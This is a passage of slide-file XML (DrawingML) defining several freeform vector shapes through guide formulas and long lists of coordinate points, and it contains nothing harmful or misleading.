                  <a:gd name="T98" fmla="*/ 357 w 526"/>
                  <a:gd name="T99" fmla="*/ 273 h 5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26" h="579">
                    <a:moveTo>
                      <a:pt x="168" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="389" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="221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9" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6442075" y="1550988"/>
                <a:ext cx="177800" cy="258762"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 494 w 495"/>
                  <a:gd name="T1" fmla="*/ 83 h 719"/>
                  <a:gd name="T2" fmla="*/ 405 w 495"/>
                  <a:gd name="T3" fmla="*/ 215 h 719"/>
                  <a:gd name="T4" fmla="*/ 473 w 495"/>
                  <a:gd name="T5" fmla="*/ 262 h 719"/>
                  <a:gd name="T6" fmla="*/ 415 w 495"/>
                  <a:gd name="T7" fmla="*/ 341 h 719"/>
                  <a:gd name="T8" fmla="*/ 347 w 495"/>
                  <a:gd name="T9" fmla="*/ 294 h 719"/>
                  <a:gd name="T10" fmla="*/ 174 w 495"/>
                  <a:gd name="T11" fmla="*/ 541 h 719"/>
                  <a:gd name="T12" fmla="*/ 174 w 495"/>
                  <a:gd name="T13" fmla="*/ 541 h 719"/>
                  <a:gd name="T14" fmla="*/ 158 w 495"/>
                  <a:gd name="T15" fmla="*/ 567 h 719"/>
                  <a:gd name="T16" fmla="*/ 153 w 495"/>
                  <a:gd name="T17" fmla="*/ 582 h 719"/>
                  <a:gd name="T18" fmla="*/ 153 w 495"/>
                  <a:gd name="T19" fmla="*/ 582 h 719"/>
                  <a:gd name="T20" fmla="*/ 158 w 495"/>
                  <a:gd name="T21" fmla="*/ 603 h 719"/>
                  <a:gd name="T22" fmla="*/ 179 w 495"/>
                  <a:gd name="T23" fmla="*/ 619 h 719"/>
                  <a:gd name="T24" fmla="*/ 179 w 495"/>
                  <a:gd name="T25" fmla="*/ 619 h 719"/>
                  <a:gd name="T26" fmla="*/ 195 w 495"/>
                  <a:gd name="T27" fmla="*/ 630 h 719"/>
                  <a:gd name="T28" fmla="*/ 195 w 495"/>
                  <a:gd name="T29" fmla="*/ 630 h 719"/>
                  <a:gd name="T30" fmla="*/ 205 w 495"/>
                  <a:gd name="T31" fmla="*/ 635 h 719"/>
                  <a:gd name="T32" fmla="*/ 147 w 495"/>
                  <a:gd name="T33" fmla="*/ 718 h 719"/>
                  <a:gd name="T34" fmla="*/ 147 w 495"/>
                  <a:gd name="T35" fmla="*/ 718 h 719"/>
                  <a:gd name="T36" fmla="*/ 110 w 495"/>
                  <a:gd name="T37" fmla="*/ 692 h 719"/>
                  <a:gd name="T38" fmla="*/ 110 w 495"/>
                  <a:gd name="T39" fmla="*/ 692 h 719"/>
                  <a:gd name="T40" fmla="*/ 74 w 495"/>
                  <a:gd name="T41" fmla="*/ 666 h 719"/>
                  <a:gd name="T42" fmla="*/ 74 w 495"/>
                  <a:gd name="T43" fmla="*/ 666 h 719"/>
                  <a:gd name="T44" fmla="*/ 43 w 495"/>
                  <a:gd name="T45" fmla="*/ 645 h 719"/>
                  <a:gd name="T46" fmla="*/ 22 w 495"/>
                  <a:gd name="T47" fmla="*/ 624 h 719"/>
                  <a:gd name="T48" fmla="*/ 22 w 495"/>
                  <a:gd name="T49" fmla="*/ 624 h 719"/>
                  <a:gd name="T50" fmla="*/ 6 w 495"/>
                  <a:gd name="T51" fmla="*/ 603 h 719"/>
                  <a:gd name="T52" fmla="*/ 0 w 495"/>
                  <a:gd name="T53" fmla="*/ 582 h 719"/>
                  <a:gd name="T54" fmla="*/ 0 w 495"/>
                  <a:gd name="T55" fmla="*/ 582 h 719"/>
                  <a:gd name="T56" fmla="*/ 0 w 495"/>
                  <a:gd name="T57" fmla="*/ 556 h 719"/>
                  <a:gd name="T58" fmla="*/ 11 w 495"/>
                  <a:gd name="T59" fmla="*/ 535 h 719"/>
                  <a:gd name="T60" fmla="*/ 11 w 495"/>
                  <a:gd name="T61" fmla="*/ 535 h 719"/>
                  <a:gd name="T62" fmla="*/ 48 w 495"/>
                  <a:gd name="T63" fmla="*/ 472 h 719"/>
                  <a:gd name="T64" fmla="*/ 231 w 495"/>
                  <a:gd name="T65" fmla="*/ 210 h 719"/>
                  <a:gd name="T66" fmla="*/ 169 w 495"/>
                  <a:gd name="T67" fmla="*/ 167 h 719"/>
                  <a:gd name="T68" fmla="*/ 227 w 495"/>
                  <a:gd name="T69" fmla="*/ 89 h 719"/>
                  <a:gd name="T70" fmla="*/ 284 w 495"/>
                  <a:gd name="T71" fmla="*/ 130 h 719"/>
                  <a:gd name="T72" fmla="*/ 378 w 495"/>
                  <a:gd name="T73" fmla="*/ 0 h 719"/>
                  <a:gd name="T74" fmla="*/ 494 w 495"/>
                  <a:gd name="T75" fmla="*/ 83 h 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95" h="719">
                    <a:moveTo>
                      <a:pt x="494" y="83"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="405" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="83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0" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6534150" y="1652588"/>
                <a:ext cx="293688" cy="292100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 814"/>
                  <a:gd name="T1" fmla="*/ 89 h 810"/>
                  <a:gd name="T2" fmla="*/ 168 w 814"/>
                  <a:gd name="T3" fmla="*/ 441 h 810"/>
                  <a:gd name="T4" fmla="*/ 173 w 814"/>
                  <a:gd name="T5" fmla="*/ 441 h 810"/>
                  <a:gd name="T6" fmla="*/ 477 w 814"/>
                  <a:gd name="T7" fmla="*/ 178 h 810"/>
                  <a:gd name="T8" fmla="*/ 598 w 814"/>
                  <a:gd name="T9" fmla="*/ 278 h 810"/>
                  <a:gd name="T10" fmla="*/ 404 w 814"/>
                  <a:gd name="T11" fmla="*/ 630 h 810"/>
                  <a:gd name="T12" fmla="*/ 404 w 814"/>
                  <a:gd name="T13" fmla="*/ 630 h 810"/>
                  <a:gd name="T14" fmla="*/ 708 w 814"/>
                  <a:gd name="T15" fmla="*/ 368 h 810"/>
                  <a:gd name="T16" fmla="*/ 813 w 814"/>
                  <a:gd name="T17" fmla="*/ 457 h 810"/>
                  <a:gd name="T18" fmla="*/ 367 w 814"/>
                  <a:gd name="T19" fmla="*/ 809 h 810"/>
                  <a:gd name="T20" fmla="*/ 241 w 814"/>
                  <a:gd name="T21" fmla="*/ 709 h 810"/>
                  <a:gd name="T22" fmla="*/ 435 w 814"/>
                  <a:gd name="T23" fmla="*/ 352 h 810"/>
                  <a:gd name="T24" fmla="*/ 435 w 814"/>
                  <a:gd name="T25" fmla="*/ 352 h 810"/>
                  <a:gd name="T26" fmla="*/ 125 w 814"/>
                  <a:gd name="T27" fmla="*/ 614 h 810"/>
                  <a:gd name="T28" fmla="*/ 0 w 814"/>
                  <a:gd name="T29" fmla="*/ 509 h 810"/>
                  <a:gd name="T30" fmla="*/ 262 w 814"/>
                  <a:gd name="T31" fmla="*/ 0 h 810"/>
                  <a:gd name="T32" fmla="*/ 372 w 814"/>
                  <a:gd name="T33" fmla="*/ 89 h 8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14" h="810">
                    <a:moveTo>
                      <a:pt x="372" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89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1" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6729413" y="1862138"/>
                <a:ext cx="203200" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 221 w 563"/>
                  <a:gd name="T1" fmla="*/ 43 h 558"/>
                  <a:gd name="T2" fmla="*/ 310 w 563"/>
                  <a:gd name="T3" fmla="*/ 6 h 558"/>
                  <a:gd name="T4" fmla="*/ 357 w 563"/>
                  <a:gd name="T5" fmla="*/ 0 h 558"/>
                  <a:gd name="T6" fmla="*/ 400 w 563"/>
                  <a:gd name="T7" fmla="*/ 11 h 558"/>
                  <a:gd name="T8" fmla="*/ 489 w 563"/>
                  <a:gd name="T9" fmla="*/ 69 h 558"/>
                  <a:gd name="T10" fmla="*/ 525 w 563"/>
                  <a:gd name="T11" fmla="*/ 117 h 558"/>
                  <a:gd name="T12" fmla="*/ 551 w 563"/>
                  <a:gd name="T13" fmla="*/ 158 h 558"/>
                  <a:gd name="T14" fmla="*/ 562 w 563"/>
                  <a:gd name="T15" fmla="*/ 200 h 558"/>
                  <a:gd name="T16" fmla="*/ 562 w 563"/>
                  <a:gd name="T17" fmla="*/ 247 h 558"/>
                  <a:gd name="T18" fmla="*/ 547 w 563"/>
                  <a:gd name="T19" fmla="*/ 290 h 558"/>
                  <a:gd name="T20" fmla="*/ 520 w 563"/>
                  <a:gd name="T21" fmla="*/ 337 h 558"/>
                  <a:gd name="T22" fmla="*/ 436 w 563"/>
                  <a:gd name="T23" fmla="*/ 437 h 558"/>
                  <a:gd name="T24" fmla="*/ 389 w 563"/>
                  <a:gd name="T25" fmla="*/ 484 h 558"/>
                  <a:gd name="T26" fmla="*/ 342 w 563"/>
                  <a:gd name="T27" fmla="*/ 521 h 558"/>
                  <a:gd name="T28" fmla="*/ 253 w 563"/>
                  <a:gd name="T29" fmla="*/ 557 h 558"/>
                  <a:gd name="T30" fmla="*/ 205 w 563"/>
                  <a:gd name="T31" fmla="*/ 557 h 558"/>
                  <a:gd name="T32" fmla="*/ 163 w 563"/>
                  <a:gd name="T33" fmla="*/ 547 h 558"/>
                  <a:gd name="T34" fmla="*/ 79 w 563"/>
                  <a:gd name="T35" fmla="*/ 489 h 558"/>
                  <a:gd name="T36" fmla="*/ 37 w 563"/>
                  <a:gd name="T37" fmla="*/ 447 h 558"/>
                  <a:gd name="T38" fmla="*/ 11 w 563"/>
                  <a:gd name="T39" fmla="*/ 400 h 558"/>
                  <a:gd name="T40" fmla="*/ 0 w 563"/>
                  <a:gd name="T41" fmla="*/ 358 h 558"/>
                  <a:gd name="T42" fmla="*/ 0 w 563"/>
                  <a:gd name="T43" fmla="*/ 316 h 558"/>
                  <a:gd name="T44" fmla="*/ 16 w 563"/>
                  <a:gd name="T45" fmla="*/ 274 h 558"/>
                  <a:gd name="T46" fmla="*/ 43 w 563"/>
                  <a:gd name="T47" fmla="*/ 227 h 558"/>
                  <a:gd name="T48" fmla="*/ 121 w 563"/>
                  <a:gd name="T49" fmla="*/ 127 h 558"/>
                  <a:gd name="T50" fmla="*/ 174 w 563"/>
                  <a:gd name="T51" fmla="*/ 80 h 558"/>
                  <a:gd name="T52" fmla="*/ 174 w 563"/>
                  <a:gd name="T53" fmla="*/ 284 h 558"/>
                  <a:gd name="T54" fmla="*/ 153 w 563"/>
                  <a:gd name="T55" fmla="*/ 311 h 558"/>
                  <a:gd name="T56" fmla="*/ 137 w 563"/>
                  <a:gd name="T57" fmla="*/ 337 h 558"/>
                  <a:gd name="T58" fmla="*/ 121 w 563"/>
                  <a:gd name="T59" fmla="*/ 384 h 558"/>
                  <a:gd name="T60" fmla="*/ 127 w 563"/>
                  <a:gd name="T61" fmla="*/ 400 h 558"/>
                  <a:gd name="T62" fmla="*/ 142 w 563"/>
                  <a:gd name="T63" fmla="*/ 421 h 558"/>
                  <a:gd name="T64" fmla="*/ 179 w 563"/>
                  <a:gd name="T65" fmla="*/ 437 h 558"/>
                  <a:gd name="T66" fmla="*/ 216 w 563"/>
                  <a:gd name="T67" fmla="*/ 431 h 558"/>
                  <a:gd name="T68" fmla="*/ 242 w 563"/>
                  <a:gd name="T69" fmla="*/ 415 h 558"/>
                  <a:gd name="T70" fmla="*/ 337 w 563"/>
                  <a:gd name="T71" fmla="*/ 337 h 558"/>
                  <a:gd name="T72" fmla="*/ 394 w 563"/>
                  <a:gd name="T73" fmla="*/ 268 h 558"/>
                  <a:gd name="T74" fmla="*/ 431 w 563"/>
                  <a:gd name="T75" fmla="*/ 216 h 558"/>
                  <a:gd name="T76" fmla="*/ 436 w 563"/>
                  <a:gd name="T77" fmla="*/ 195 h 558"/>
                  <a:gd name="T78" fmla="*/ 431 w 563"/>
                  <a:gd name="T79" fmla="*/ 158 h 558"/>
                  <a:gd name="T80" fmla="*/ 421 w 563"/>
                  <a:gd name="T81" fmla="*/ 143 h 558"/>
                  <a:gd name="T82" fmla="*/ 378 w 563"/>
                  <a:gd name="T83" fmla="*/ 121 h 558"/>
                  <a:gd name="T84" fmla="*/ 357 w 563"/>
                  <a:gd name="T85" fmla="*/ 127 h 558"/>
                  <a:gd name="T86" fmla="*/ 331 w 563"/>
                  <a:gd name="T87" fmla="*/ 132 h 558"/>
                  <a:gd name="T88" fmla="*/ 284 w 563"/>
                  <a:gd name="T89" fmla="*/ 174 h 558"/>
                  <a:gd name="T90" fmla="*/ 226 w 563"/>
                  <a:gd name="T91" fmla="*/ 227 h 558"/>
                  <a:gd name="T92" fmla="*/ 174 w 563"/>
                  <a:gd name="T93" fmla="*/ 284 h 5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563" h="558">
                    <a:moveTo>
                      <a:pt x="221" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="174" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="174" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
